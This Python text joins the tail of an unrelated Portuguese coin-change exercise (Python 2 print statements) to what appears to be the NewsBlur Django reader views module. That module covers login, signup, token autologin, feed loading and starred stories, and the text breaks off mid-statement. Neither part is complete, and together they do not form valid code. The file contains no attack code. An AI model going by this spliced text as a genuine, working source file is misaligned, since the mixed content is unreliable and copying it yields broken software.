n -= int(m10) * 0.10
if round(n, 2) >= 0.05:
    print '1 moeda(s) de R$ 0.05'
    m1 = (n - 0.05) * 100
else:
    print '0 moeda(s) de R$ 0.05'
    m1 = round(n, 2) * 100
if round(m1, 0):
    print '%.0f moeda(s) de R$ 0.01' % m1
else:
    print '0 moeda(s) de R$ 0.01'

import datetime
import time
import boto
import redis
import requests
import random
import zlib
from django.shortcuts import get_object_or_404
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.template.loader import render_to_string
from django.db import IntegrityError
from django.db.models import Q
from django.views.decorators.cache import never_cache
from django.core.urlresolvers import reverse
from django.contrib.auth import login as login_user
from django.contrib.auth import logout as logout_user
from django.contrib.auth.models import User
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden, Http404
from django.conf import settings
from django.core.mail import mail_admins
from django.core.validators import email_re
from django.core.mail import EmailMultiAlternatives
from django.contrib.sites.models import Site
from django.utils import feedgenerator
from mongoengine.queryset import OperationError
from mongoengine.queryset import NotUniqueError
from apps.recommendations.models import RecommendedFeed
from apps.analyzer.models import MClassifierTitle, MClassifierAuthor, MClassifierFeed, MClassifierTag
from apps.analyzer.models import apply_classifier_titles, apply_classifier_feeds
from apps.analyzer.models import apply_classifier_authors, apply_classifier_tags
from apps.analyzer.models import get_classifiers_for_user, sort_classifiers_by_feed
from apps.profile.models import Profile
from apps.reader.models import UserSubscription, UserSubscriptionFolders, RUserStory, Feature
from apps.reader.forms import SignupForm, LoginForm, FeatureForm
from apps.rss_feeds.models import MFeedIcon, MStarredStoryCounts
from apps.search.models import MUserSearch
from apps.statistics.models import MStatistics
# from apps.search.models import SearchStarredStory
try:
    from apps.rss_feeds.models import Feed, MFeedPage, DuplicateFeed, MStory, MStarredStory
except:
    pass
from apps.social.models import MSharedStory, MSocialProfile, MSocialServices
from apps.social.models import MSocialSubscription, MActivity, MInteraction
from apps.categories.models import MCategory
from apps.social.views import load_social_page
from apps.rss_feeds.tasks import ScheduleImmediateFetches
from utils import json_functions as json
from utils.user_functions import get_user, ajax_login_required
from utils.feed_functions import relative_timesince
from utils.story_functions import format_story_link_date__short
from utils.story_functions import format_story_link_date__long
from utils.story_functions import strip_tags
from utils import log as logging
from utils.view_functions import get_argument_or_404, render_to, is_true
from utils.view_functions import required_params
from utils.ratelimit import ratelimit
from vendor.timezones.utilities import localtime_for_timezone


BANNED_URLS = [
    "brentozar.com",
]

@never_cache
@render_to('reader/dashboard.xhtml')
def index(request, **kwargs):
    if request.method == "GET" and request.subdomain and request.subdomain not in ['dev', 'www', 'debug']:
        username = request.subdomain
        try:
            if '.' in username:
                username = username.split('.')[0]
            user = User.objects.get(username__iexact=username)
        except User.DoesNotExist:
            return HttpResponseRedirect('http://%s%s' % (
                Site.objects.get_current().domain,
                reverse('index')))
        return load_social_page(request, user_id=user.pk, username=request.subdomain, **kwargs)

    if request.user.is_anonymous():
        return welcome(request, **kwargs)
    else:
        return dashboard(request, **kwargs)

def dashboard(request, **kwargs):
    user              = request.user
    feed_count        = UserSubscription.objects.filter(user=request.user).count()
    recommended_feeds = RecommendedFeed.objects.filter(is_public=True,
                                                       approved_date__lte=datetime.datetime.now()
                                                       ).select_related('feed')[:2]
    unmoderated_feeds = []
    if user.is_staff:
        unmoderated_feeds = RecommendedFeed.objects.filter(is_public=False,
                                                           declined_date__isnull=True
                                                           ).select_related('feed')[:2]
    statistics        = MStatistics.all()
    social_profile    = MSocialProfile.get_user(user.pk)

    start_import_from_google_reader = request.session.get('import_from_google_reader', False)
    if start_import_from_google_reader:
        del request.session['import_from_google_reader']
    
    if not user.is_active:
        url = "https://%s%s" % (Site.objects.get_current().domain,
                                 reverse('stripe-form'))
        return HttpResponseRedirect(url)

    logging.user(request, "~FBLoading dashboard")

    return {
        'user_profile'      : user.profile,
        'feed_count'        : feed_count,
        'account_images'    : range(1, 4),
        'recommended_feeds' : recommended_feeds,
        'unmoderated_feeds' : unmoderated_feeds,
        'statistics'        : statistics,
        'social_profile'    : social_profile,
        'start_import_from_google_reader': start_import_from_google_reader,
        'debug'             : settings.DEBUG,
    }, "reader/dashboard.xhtml"
    
def welcome(request, **kwargs):
    user              = get_user(request)
    statistics        = MStatistics.all()
    social_profile    = MSocialProfile.get_user(user.pk)
    
    if request.method == "POST":
        if request.POST.get('submit', '').startswith('log'):
            login_form  = LoginForm(request.POST, prefix='login')
            signup_form = SignupForm(prefix='signup')
        else:
            login_form  = LoginForm(prefix='login')
            signup_form = SignupForm(request.POST, prefix='signup')
    else:
        login_form  = LoginForm(prefix='login')
        signup_form = SignupForm(prefix='signup')
    
    logging.user(request, "~FBLoading welcome")
    
    return {
        'user_profile'      : hasattr(user, 'profile') and user.profile,
        'login_form'        : login_form,
        'signup_form'       : signup_form,
        'statistics'        : statistics,
        'social_profile'    : social_profile,
        'post_request'      : request.method == 'POST',
    }, "reader/welcome.xhtml"

@never_cache
def login(request):
    code = -1
    message = ""
    if request.method == "POST":
        form = LoginForm(request.POST, prefix='login')
        if form.is_valid():
            login_user(request, form.get_user())
            if request.POST.get('api'):
                logging.user(form.get_user(), "~FG~BB~SKiPhone Login~FW")
                code = 1
            else:
                logging.user(form.get_user(), "~FG~BBLogin~FW")
                return HttpResponseRedirect(reverse('index'))
        else:
            message = form.errors.items()[0][1][0]

    if request.POST.get('api'):
        return HttpResponse(json.encode(dict(code=code, message=message)), mimetype='application/json')
    else:
        return index(request)
    
@never_cache
def signup(request):
    if request.method == "POST":
        form = SignupForm(prefix='signup', data=request.POST)
        if form.is_valid():
            new_user = form.save()
            login_user(request, new_user)
            logging.user(new_user, "~FG~SB~BBNEW SIGNUP: ~FW%s" % new_user.email)
            if not new_user.is_active:
                url = "https://%s%s" % (Site.objects.get_current().domain,
                                         reverse('stripe-form'))
                return HttpResponseRedirect(url)
    
    return index(request)
        
@never_cache
def logout(request):
    logging.user(request, "~FG~BBLogout~FW")
    logout_user(request)
    
    if request.GET.get('api'):
        return HttpResponse(json.encode(dict(code=1)), mimetype='application/json')
    else:
        return HttpResponseRedirect(reverse('index'))

def autologin(request, username, secret):
    next = request.GET.get('next', '')
    
    if not username or not secret:
        return HttpResponseForbidden()
    
    profile = Profile.objects.filter(user__username=username, secret_token=secret)
    if not profile:
        return HttpResponseForbidden()

    user = profile[0].user
    user.backend = settings.AUTHENTICATION_BACKENDS[0]
    login_user(request, user)
    logging.user(user, "~FG~BB~SKAuto-Login. Next stop: %s~FW" % (next if next else 'Homepage',))
    
    if next and not next.startswith('/'):
        next = '?next=' + next
        return HttpResponseRedirect(reverse('index') + next)
    elif next:
        return HttpResponseRedirect(next)
    else:
        return HttpResponseRedirect(reverse('index'))
    
@ratelimit(minutes=1, requests=24)
@never_cache
@json.json_view
def load_feeds(request):
    user             = get_user(request)
    feeds            = {}
    include_favicons = request.REQUEST.get('include_favicons', False)
    flat             = request.REQUEST.get('flat', False)
    update_counts    = request.REQUEST.get('update_counts', False)
    version          = int(request.REQUEST.get('v', 1))
    
    if include_favicons == 'false': include_favicons = False
    if update_counts == 'false': update_counts = False
    if flat == 'false': flat = False
    
    if flat: return load_feeds_flat(request)
    
    try:
        folders = UserSubscriptionFolders.objects.get(user=user)
    except UserSubscriptionFolders.DoesNotExist:
        data = dict(feeds=[], folders=[])
        return data
    except UserSubscriptionFolders.MultipleObjectsReturned:
        UserSubscriptionFolders.objects.filter(user=user)[1:].delete()
        folders = UserSubscriptionFolders.objects.get(user=user)
    
    user_subs = UserSubscription.objects.select_related('feed').filter(user=user)
    
    day_ago = datetime.datetime.now() - datetime.timedelta(days=1)
    scheduled_feeds = []
    for sub in user_subs:
        pk = sub.feed_id
        if update_counts and sub.needs_unread_recalc:
            sub.calculate_feed_scores(silent=True)
        feeds[pk] = sub.canonical(include_favicon=include_favicons)
        
        if not sub.active: continue
        if not sub.feed.active and not sub.feed.has_feed_exception:
            scheduled_feeds.append(sub.feed.pk)
        elif sub.feed.active_subscribers <= 0:
            scheduled_feeds.append(sub.feed.pk)
        elif sub.feed.next_scheduled_update < day_ago:
            scheduled_feeds.append(sub.feed.pk)
    
    if len(scheduled_feeds) > 0 and request.user.is_authenticated():
        logging.user(request, "~SN~FMTasking the scheduling immediate fetch of ~SB%s~SN feeds..." % 
                     len(scheduled_feeds))
        ScheduleImmediateFetches.apply_async(kwargs=dict(feed_ids=scheduled_feeds, user_id=user.pk))

    starred_counts, starred_count = MStarredStoryCounts.user_counts(user.pk, include_total=True)
    if not starred_count and len(starred_counts):
        starred_count = MStarredStory.objects(user_id=user.pk).count()
    
    social_params = {
        'user_id': user.pk,
        'include_favicon': include_favicons,
        'update_counts': update_counts,
    }
    social_feeds = MSocialSubscription.feeds(**social_params)
    social_profile = MSocialProfile.profile(user.pk)
    social_services = MSocialServices.profile(user.pk)
    
    categories = None
    if not user_subs:
        categories = MCategory.serialize()

    logging.user(request, "~FB~SBLoading ~FY%s~FB/~FM%s~FB feeds/socials%s" % (
            len(feeds.keys()), len(social_feeds), '. ~FCUpdating counts.' if update_counts else ''))

    data = {
        'feeds': feeds.values() if version == 2 else feeds,
        'social_feeds': social_feeds,
        'social_profile': social_profile,
        'social_services': social_services,
        'user_profile': user.profile,
        "is_staff": user.is_staff,
        'folders': json.decode(folders.folders),
        'starred_count': starred_count,
        'starred_counts': starred_counts,
        'categories': categories
    }
    return data

@json.json_view
def load_feed_favicons(request):
    user = get_user(request)
    feed_ids = request.REQUEST.getlist('feed_ids')
    
    if not feed_ids:
        user_subs = UserSubscription.objects.select_related('feed').filter(user=user, active=True)
        feed_ids  = [sub['feed__pk'] for sub in user_subs.values('feed__pk')]

    feed_icons = dict([(i.feed_id, i.data) for i in MFeedIcon.objects(feed_id__in=feed_ids)])
        
    return feed_icons

def load_feeds_flat(request):
    user = request.user
    include_favicons = is_true(request.REQUEST.get('include_favicons', False))
    update_counts    = is_true(request.REQUEST.get('update_counts', True))
    
    feeds = {}
    day_ago = datetime.datetime.now() - datetime.timedelta(days=1)
    scheduled_feeds = []
    iphone_version = "2.1"
    
    if include_favicons == 'false': include_favicons = False
    if update_counts == 'false': update_counts = False
    
    if not user.is_authenticated():
        return HttpResponseForbidden()
    
    try:
        folders = UserSubscriptionFolders.objects.get(user=user)
    except UserSubscriptionFolders.DoesNotExist:
        folders = []
        
    user_subs = UserSubscription.objects.select_related('feed').filter(user=user, active=True)
    if not user_subs and folders:
        folders.auto_activate()
        user_subs = UserSubscription.objects.select_related('feed').filter(user=user, active=True)

    for sub in user_subs:
        if update_counts and sub.needs_unread_recalc:
            sub.calculate_feed_scores(silent=True)
        feeds[sub.feed_id] = sub.canonical(include_favicon=include_favicons)
        if not sub.feed.active and not sub.feed.has_feed_exception:
            scheduled_feeds.append(sub.feed.pk)
        elif sub.feed.active_subscribers <= 0:
            scheduled_feeds.append(sub.feed.pk)
        elif sub.feed.next_scheduled_update < day_ago:
            scheduled_feeds.append(sub.feed.pk)
    
    if len(scheduled_feeds) > 0 and request.user.is_authenticated():
        logging.user(request, "~SN~FMTasking the scheduling immediate fetch of ~SB%s~SN feeds..." % 
                     len(scheduled_feeds))
        ScheduleImmediateFetches.apply_async(kwargs=dict(feed_ids=scheduled_feeds, user_id=user.pk))
    
    flat_folders = []
    if folders:
        flat_folders = folders.flatten_folders(feeds=feeds)
        
    social_params = {
        'user_id': user.pk,
        'include_favicon': include_favicons,
        'update_counts': update_counts,
    }
    social_feeds = MSocialSubscription.feeds(**social_params)
    social_profile = MSocialProfile.profile(user.pk)
    social_services = MSocialServices.profile(user.pk)
    starred_counts, starred_count = MStarredStoryCounts.user_counts(user.pk, include_total=True)
    if not starred_count and len(starred_counts):
        starred_count = MStarredStory.objects(user_id=user.pk).count()

    categories = None
    if not user_subs:
        categories = MCategory.serialize()
        
    logging.user(request, "~FB~SBLoading ~FY%s~FB/~FM%s~FB feeds/socials ~FMflat~FB%s" % (
            len(feeds.keys()), len(social_feeds), '. ~FCUpdating counts.' if update_counts else ''))

    data = {
        "flat_folders": flat_folders, 
        "feeds": feeds,
        "social_feeds": social_feeds,
        "social_profile": social_profile,
        "social_services": social_services,
        "user": user.username,
        "is_staff": user.is_staff,
        "user_profile": user.profile,
        "iphone_version": iphone_version,
        "categories": categories,
        'starred_count': starred_count,
        'starred_counts': starred_counts,
    }
    return data

@ratelimit(minutes=1, requests=10)
@never_cache
@json.json_view
def refresh_feeds(request):
    user = get_user(request)
    feed_ids = request.REQUEST.getlist('feed_id')
    check_fetch_status = request.REQUEST.get('check_fetch_status')
    favicons_fetching = request.REQUEST.getlist('favicons_fetching')
    social_feed_ids = [feed_id for feed_id in feed_ids if 'social:' in feed_id]
    feed_ids = list(set(feed_ids) - set(social_feed_ids))
    
    feeds = {}
    if feed_ids or (not social_feed_ids and not feed_ids):
        feeds = UserSubscription.feeds_with_updated_counts(user, feed_ids=feed_ids, 
                                                           check_fetch_status=check_fetch_status)
    social_feeds = {}
    if social_feed_ids or (not social_feed_ids and not feed_ids):
        social_feeds = MSocialSubscription.feeds_with_updated_counts(user, social_feed_ids=social_feed_ids)
    
    favicons_fetching = [int(f) for f in favicons_fetching if f]
    feed_icons = {}
    if favicons_fetching:
        feed_icons = dict([(i.feed_id, i) for i in MFeedIcon.objects(feed_id__in=favicons_fetching)])
    
    for feed_id, feed in feeds.items():
        if feed_id in favicons_fetching and feed_id in feed_icons:
            feeds[feed_id]['favicon'] = feed_icons[feed_id].data
            feeds[feed_id]['favicon_color'] = feed_icons[feed_id].color
            feeds[feed_id]['favicon_fetching'] = feed.get('favicon_fetching')

    user_subs = UserSubscription.objects.filter(user=user, active=True).only('feed')
    sub_feed_ids = [s.feed_id for s in user_subs]

    if favicons_fetching:
        moved_feed_ids = [f for f in favicons_fetching if f not in sub_feed_ids]
        for moved_feed_id in moved_feed_ids:
            duplicate_feeds = DuplicateFeed.objects.filter(duplicate_feed_id=moved_feed_id)

            if duplicate_feeds and duplicate_feeds[0].feed.pk in feeds:
                feeds[moved_feed_id] = feeds[duplicate_feeds[0].feed_id]
                feeds[moved_feed_id]['dupe_feed_id'] = duplicate_feeds[0].feed_id
    
    if check_fetch_status:
        missing_feed_ids = list(set(feed_ids) - set(sub_feed_ids))
        if missing_feed_ids:
            duplicate_feeds = DuplicateFeed.objects.filter(duplicate_feed_id__in=missing_feed_ids)
            for duplicate_feed in duplicate_feeds:
                feeds[duplicate_feed.duplicate_feed_id] = {'id': duplicate_feed.feed_id}
    
    interactions_count = MInteraction.user_unread_count(user.pk)

    if True or settings.DEBUG or check_fetch_status:
        logging.user(request, "~FBRefreshing %s feeds (%s/%s)" % (
            len(feeds.keys()), check_fetch_status, len(favicons_fetching)))

    return {
        'feeds': feeds, 
        'social_feeds': social_feeds,
        'interactions_count': interactions_count,
    }

@json.json_view
def interactions_count(request):
    user = get_user(request)

    interactions_count = MInteraction.user_unread_count(user.pk)

    return {
        'interactions_count': interactions_count,
    }
    
@never_cache
@ajax_login_required
@json.json_view
def feed_unread_count(request):
    user = request.user
    feed_ids = request.REQUEST.getlist('feed_id')
    force = request.REQUEST.get('force', False)
    social_feed_ids = [feed_id for feed_id in feed_ids if 'social:' in feed_id]
    feed_ids = list(set(feed_ids) - set(social_feed_ids))
    
    feeds = {}
    if feed_ids:
        feeds = UserSubscription.feeds_with_updated_counts(user, feed_ids=feed_ids, force=force)

    social_feeds = {}
    if social_feed_ids:
        social_feeds = MSocialSubscription.feeds_with_updated_counts(user, social_feed_ids=social_feed_ids)
    
    if len(feed_ids) == 1:
        if settings.DEBUG:
            feed_title = Feed.get_by_id(feed_ids[0]).feed_title
        else:
            feed_title = feed_ids[0]
    elif len(social_feed_ids) == 1:
        feed_title = MSocialProfile.objects.get(user_id=social_feed_ids[0].replace('social:', '')).username
    else:
        feed_title = "%s feeds" % (len(feeds) + len(social_feeds))
    logging.user(request, "~FBUpdating unread count on: %s" % feed_title)
    
    return {'feeds': feeds, 'social_feeds': social_feeds}
    
def refresh_feed(request, feed_id):
    user = get_user(request)
    feed = get_object_or_404(Feed, pk=feed_id)
    
    feed = feed.update(force=True, compute_scores=False)
    usersub = UserSubscription.objects.get(user=user, feed=feed)
    usersub.calculate_feed_scores(silent=False)
    
    logging.user(request, "~FBRefreshing feed: %s" % feed)
    
    return load_single_feed(request, feed_id)
    
@never_cache
@json.json_view
def load_single_feed(request, feed_id):
    start                   = time.time()
    user                    = get_user(request)
    # offset                  = int(request.REQUEST.get('offset', 0))
    # limit                   = int(request.REQUEST.get('limit', 6))
    limit                   = 6
    page                    = int(request.REQUEST.get('page', 1))
    offset                  = limit * (page-1)
    order                   = request.REQUEST.get('order', 'newest')
    read_filter             = request.REQUEST.get('read_filter', 'all')
    query                   = request.REQUEST.get('query')
    include_story_content   = is_true(request.REQUEST.get('include_story_content', True))
    include_hidden          = is_true(request.REQUEST.get('include_hidden', False))
    message                 = None
    user_search             = None

    dupe_feed_id = None
    user_profiles = []
    now = localtime_for_timezone(datetime.datetime.now(), user.profile.timezone)
    if not feed_id: raise Http404

    feed_address = request.REQUEST.get('feed_address')
    feed = Feed.get_by_id(feed_id, feed_address=feed_address)
    if not feed:
        raise Http404
    
    try:
        usersub = UserSubscription.objects.get(user=user, feed=feed)
    except UserSubscription.DoesNotExist:
        usersub = None
    
    if query:
        if user.profile.is_premium:
            user_search = MUserSearch.get_user(user.pk)
            user_search.touch_search_date()
            stories = feed.find_stories(query, order=order, offset=offset, limit=limit)
        else:
            stories = []
            message = "You must be a premium subscriber to search."
    elif read_filter == 'starred':
        mstories = MStarredStory.objects(
            user_id=user.pk,
            story_feed_id=feed_id
        ).order_by('%sstarred_date' % ('-' if order == 'newest' else ''))[offset:offset+limit]
        stories = Feed.format_stories(mstories) 
    elif usersub and (read_filter == 'unread' or order == 'oldest'):
        stories = usersub.get_stories(order=order, read_filter=read_filter, offset=offset, limit=limit,
                                      default_cutoff_date=user.profile.unread_cutoff)
    else:
        stories = feed.get_stories(offset, limit)
    
    checkpoint1 = time.time()
    
    try:
        stories, user_profiles = MSharedStory.stories_with_comments_and_profiles(stories, user.pk)
    except redis.ConnectionError:
        logging.user(request, "~BR~FK~SBRedis is unavailable for shared stories.")

    checkpoint2 = time.time()
    
    # Get intelligence classifier for user
    
    if usersub and usersub.is_trained:
        classifier_feeds   = list(MClassifierFeed.objects(user_id=user.pk, feed_id=feed_id, social_user_id=0))
        classifier_authors = list(MClassifierAuthor.objects(user_id=user.pk, feed_id=feed_id))
        classifier_titles  = list(MClassifierTitle.objects(user_id=user.pk, feed_id=feed_id))
        classifier_tags    = list(MClassifierTag.objects(user_id=user.pk, feed_id=feed_id))
    else:
        classifier_feeds = []
        classifier_authors = []
        classifier_titles = []
        classifier_tags = []
    classifiers = get_classifiers_for_user(user, feed_id=feed_id, 
                                           classifier_feeds=classifier_feeds, 
                                           classifier_authors=classifier_authors, 
                                           classifier_titles=classifier_titles,
                                           classifier_tags=classifier_tags)
    checkpoint3 = time.time()
    
    unread_story_hashes = []
    if stories:
        if (read_filter == 'all' or query) and usersub:
            unread_story_hashes = UserSubscription.story_hashes(user.pk, read_filter='unread',
                                                      feed_ids=[usersub.feed_id],
                                                      usersubs=[usersub],
                                                      group_by_feed=False,
                                                      cutoff_date=user.profile.unread_cutoff)
        story_hashes = [story['story_hash'] for story in stories if story['story_hash']]
        starred_stories = MStarredStory.objects(user_id=user.pk, 
                                                story_feed_id=feed.pk, 
                                                story_hash__in=story_hashes)\
                                       .only('story_hash', 'starred_date', 'user_tags')
        shared_story_hashes = MSharedStory.check_shared_story_hashes(user.pk, story_hashes)
        shared_stories = []
        if shared_story_hashes:
            shared_stories = MSharedStory.objects(user_id=user.pk, 
                                                  story_hash__in=shared_story_hashes)\
                                         .only('story_hash', 'shared_date', 'comments')
        starred_stories = dict([(story.story_hash, dict(starred_date=story.starred_date,
                                                        user_tags=story.user_tags))
                                for story in starred_stories])
        shared_stories = dict([(story.story_hash, dict(shared_date=story.shared_date,
                                                       comments=story.comments))
                               for story in shared_stories])
            
    checkpoint4 = time.time()
    
    for story in stories:
        if not include_story_content:
            del story['story_content']
        story_date = localtime_for_timezone(story['story_date'], user.profile.timezone)
        nowtz = localtime_for_timezone(now, user.profile.timezone)
        story['short_parsed_date'] = format_story_link_date__short(story_date, nowtz)
        story['long_parsed_date'] = format_story_link_date__long(story_date, nowtz)
        if usersub:
            story['read_status'] = 1
            if (read_filter == 'all' or query) and usersub:
                story['read_status'] = 1 if story['story_hash'] not in unread_story_hashes else 0
            elif read_filter == 'unread' and usersub:
                story['read_status'] = 0
            if story['story_hash'] in starred_stories:
                story['starred'] = True
                starred_date = localtime_for_timezone(starred_stories[story['story_hash']]['starred_date'],
                                                      user.profile.timezone)
                story['starred_date'] = format_story_link_date__long(starred_date, now)
                story['starred_timestamp'] = starred_date.strftime('%s')
                story['user_tags'] = starred_stories[story['story_hash']]['user_tags']
            if story['story_hash'] in shared_stories:
                story['shared'] = True
                shared_date = localtime_for_timezone(shared_stories[story['story_hash']]['shared_date'],
                                                     user.profile.timezone)
                story['shared_date'] = format_story_link_date__long(shared_date, now)
                story['shared_comments'] = strip_tags(shared_stories[story['story_hash']]['comments'])
        else:
            story['read_status'] = 1
        story['intelligence'] = {
            'feed': apply_classifier_feeds(classifier_feeds, feed),
            'author': apply_classifier_authors(classifier_authors, story),
            'tags': apply_classifier_tags(classifier_tags, story),
            'title': apply_classifier_titles(classifier_titles, story),
        }
        story['score'] = UserSubscription.score_story(story['intelligence'])
        
    # Intelligence
    feed_tags = json.decode(feed.data.popular_tags) if feed.data.popular_tags else []
    feed_authors = json.decode(feed.data.popular_authors) if feed.data.popular_authors else []
    
    if usersub:
        usersub.feed_opens += 1
        usersub.needs_unread_recalc = True
        usersub.save(update_fields=['feed_opens', 'needs_unread_recalc'])
    
    diff1 = checkpoint1-start
    diff2 = checkpoint2-start
    diff3 = checkpoint3-start
    diff4 = checkpoint4-start
    timediff = time.time()-start
    last_update = relative_timesince(feed.last_update)
    time_breakdown = ""
    if timediff > 1 or settings.DEBUG:
        time_breakdown = "~SN~FR(~SB%.4s/%.4s/%.4s/%.4s~SN)" % (
                          diff1, diff2, diff3, diff4)
    
    search_log = "~SN~FG(~SB%s~SN) " % query if query else ""
    logging.user(request, "~FYLoading feed: ~SB%s%s (%s/%s) %s%s" % (
        feed.feed_title[:22], ('~SN/p%s' % page) if page > 1 else '', order, read_filter, search_log, time_breakdown))

    if not include_hidden:
        hidden_stories_removed = 0
        new_stories = []
        for story in stories:
            if story['score'] >= 0:
                new_stories.append(story)
            else:
                hidden_stories_removed += 1
        stories = new_stories
    
    data = dict(stories=stories, 
                user_profiles=user_profiles,
                feed_tags=feed_tags, 
                feed_authors=feed_authors, 
                classifiers=classifiers,
                updated=last_update,
                user_search=user_search,
                feed_id=feed.pk,
                elapsed_time=round(float(timediff), 2),
                message=message)
    
    if not include_hidden: data['hidden_stories_removed'] = hidden_stories_removed
    if dupe_feed_id: data['dupe_feed_id'] = dupe_feed_id
    if not usersub:
        data.update(feed.canonical())
    # if not usersub and feed.num_subscribers <= 1:
    #     data = dict(code=-1, message="You must be subscribed to this feed.")
    
    # if page <= 3:
    #     import random
    #     time.sleep(random.randint(2, 4))
    
    # if page == 2:
    #     assert False

    return data

def load_feed_page(request, feed_id):
    if not feed_id:
        raise Http404
    
    feed = Feed.get_by_id(feed_id)
    
    if feed and feed.has_page and not feed.has_page_exception:
        if settings.BACKED_BY_AWS.get('pages_on_node'):
            url = "http://%s/original_page/%s" % (
                settings.ORIGINAL_PAGE_SERVER,
                feed.pk,
            )
            page_response = requests.get(url)
            if page_response.status_code == 200:
                response = HttpResponse(page_response.content, mimetype="text/html; charset=utf-8")
                response['Content-Encoding'] = 'gzip'
                response['Last-Modified'] = page_response.headers.get('Last-modified')
                response['Etag'] = page_response.headers.get('Etag')
                response['Content-Length'] = str(len(page_response.content))
                logging.user(request, "~FYLoading original page, proxied from node: ~SB%s bytes" %
                             (len(page_response.content)))
                return response
        
        if settings.BACKED_BY_AWS['pages_on_s3'] and feed.s3_page:
            if settings.PROXY_S3_PAGES:
                key = settings.S3_PAGES_BUCKET.get_key(feed.s3_pages_key)
                if key:
                    compressed_data = key.get_contents_as_string()
                    response = HttpResponse(compressed_data, mimetype="text/html; charset=utf-8")
                    response['Content-Encoding'] = 'gzip'
            
                    logging.user(request, "~FYLoading original page, proxied: ~SB%s bytes" %
                                 (len(compressed_data)))
                    return response
            else:
                logging.user(request, "~FYLoading original page, non-proxied")
                return HttpResponseRedirect('//%s/%s' % (settings.S3_PAGES_BUCKET_NAME,
                                                         feed.s3_pages_key))
    
    data = MFeedPage.get_data(feed_id=feed_id)
    
    if not data or not feed or not feed.has_page or feed.has_page_exception:
        logging.user(request, "~FYLoading original page, ~FRmissing")
        return render(request, 'static/404_original_page.xhtml', {}, 
            content_type='text/html',
            status=404)
    
    logging.user(request, "~FYLoading original page, from the db")
    return HttpResponse(data, mimetype="text/html; charset=utf-8")

@json.json_view
def load_starred_stories(request):
    user         = get_user(request)
    offset       = int(request.REQUEST.get('offset', 0))
    limit        = int(request.REQUEST.get('limit', 10))
    page         = int(request.REQUEST.get('page', 0))
    query        = request.REQUEST.get('query')
    order        = request.REQUEST.get('order', 'newest')
    tag          = request.REQUEST.get('tag')
    story_hashes = request.REQUEST.getlist('h')[:100]
    version      = int(request.REQUEST.get('v', 1))
    now          = localtime_for_timezone(datetime.datetime.now(), user.profile.timezone)
    message      = None
    order_by     = '-' if order == "newest" else ""
    if page: offset = limit * (page - 1)
    
    if query:
        # results = SearchStarredStory.query(user.pk, query)                                                            
        # story_ids = [result.db_id for result in results]                                                          
        if user.profile.is_premium:
            stories = MStarredStory.find_stories(query, user.pk, tag=tag, offset=offset, limit=limit,
                                                 order=order)
        else:
            stories = []
            message = "You must be a premium subscriber to search."
    elif tag:
        if user.profile.is_premium:
            mstories = MStarredStory.objects(
                user_id=user.pk,
                user_tags__contains=tag
            ).order_by('%sstarred_date' % order_by)[offset:offset+limit]
            stories = Feed.format_stories(mstories)        
        else:
            stories = []
            message = "You must be a premium subscriber to read saved stories by tag."
    elif story_hashes:
        mstories = MStarredStory.objects(
            user_id=user.pk,
            story_hash__in=story_hashes
        ).order_by('%sstarred_date' % order_by)[offset:offset+limit]
        stories = Feed.format_stories(mstories)
    else:
        mstories = MStarredStory.objects(
            user_id=user.pk
        ).order_by('%sstarred_date' % order_by)[offset:offset+limit]
        stories = Feed.format_stories(mstories)
    
    stories, user_profiles = MSharedStory.stories_with_comments_and_profiles(stories, user.pk, check_all=True)
    
    story_hashes   = [story['story_hash'] for story in stories]
    story_feed_ids = list(set(s['story_feed_id'] for s in stories))
    usersub_ids    = UserSubscription.objects.filter(user__pk=user.pk, feed__pk__in=story_feed_ids).values('feed__pk')
    usersub_ids    = [us['feed__pk'] for us in usersub_ids]
    unsub_feed_ids = list(set(story_feed_ids).difference(set(usersub_ids)))
    unsub_feeds    = Feed.objects.filter(pk__in=unsub_feed_ids)
    unsub_feeds    = dict((feed.pk, feed.canonical(include_favicon=False)) for feed in unsub_feeds)
    shared_story_hashes = MSharedStory.check_shared_story_hashes(user.pk, story_hashes)
    shared_stories = []
    if shared_story_hashes:
        shared_stories = MSharedStory.objects(user_id=user.pk, 
                                              story_hash__in=shared_story_hashes)\
                                     .only('story_hash', 'shared_date', 'comments')
    shared_stories = dict([(story.story_hash, dict(shared_date=story.shared_date,
                                                   comments=story.comments))
                           for story in shared_stories])

    nowtz = localtime_for_timezone(now, user.profile.timezone)
    for story in stories:
        story_date                 = localtime_for_timezone(story['story_date'], user.profile.timezone)
        story['short_parsed_date'] = format_story_link_date__short(story_date, nowtz)
        story['long_parsed_date']  = format_story_link_date__long(story_date, nowtz)
        starred_date               = localtime_for_timezone(story['starred_date'], user.profile.timezone)
        story['starred_date']      = format_story_link_date__long(starred_date, nowtz)
        story['starred_timestamp'] = starred_date.strftime('%s')
        story['read_status']       = 1
        story['starred']           = True
        story['intelligence']      = {
            'feed':   1,
            'author': 0,
            'tags':   0,
            'title':  0,
        }
        if story['story_hash'] in shared_stories:
            story['shared'] = True
            story['shared_comments'] = strip_tags(shared_stories[story['story_hash']]['comments'])
    
    search_log = "~SN~FG(~SB%s~SN)" % query if query else ""
    logging.user(request, "~FCLoading starred stories: ~SB%s stories %s" % (len(stories), search_log))
    
    return {
        "stories": stories,
        "user_profiles": user_profiles,
        'feeds': unsub_feeds.values() if version == 2 else unsub_feeds,
        "message": message,
    }

@json.json_view
def starred_story_hashes(request):
    user               = get_user(request)
    include_timestamps = is_true(request.REQUEST.get('include_timestamps', False))
    
    mstories = MStarredStory.objects(
        user_id=user.pk
    ).only('story_hash', 'starred_date').order_by('-starred_date')
    
    if include_timestamps:
        story_hashes = [(s.story_hash, s.starred_date.strftime("%s")) for s in mstories]
    else:
        story_hashes = [s.story_hash for s in mstories]
    
    logging.user(request, "~FYLoading ~FCstarred story hashes~FY: %s story hashes" % 
                           (len(story_hashes)))

    return dict(starred_story_hashes=story_hashes)

def starred_stories_rss_feed(request, user_id, secret_token, tag_slug):
    try:
        user = User.objects.get(pk=user_id)
    except User.DoesNotExist:
        raise Http404
    
    try:
        tag_counts = MStarredStoryCounts.objects.get(user_id=user_id, slug=tag_slug)
    except MStarredStoryCounts.MultipleObjectsReturned:
        tag_counts = MStarredStoryCounts.objects(user_id=user_id, slug=tag_slug).first()
    except MStarredStoryCounts.DoesNotExist:
        raise Http404
    
    data = {}
    data['title'] = "Saved Stories - %s" % tag_counts.tag
    data['link'] = "%s%s" % (
        settings.NEWSBLUR_URL,
        reverse('saved-stories-tag', kwargs=dict(tag_name=tag_slug)))
    data['description'] = "Stories saved by %s on NewsBlur with the tag \"%s\"." % (user.username,
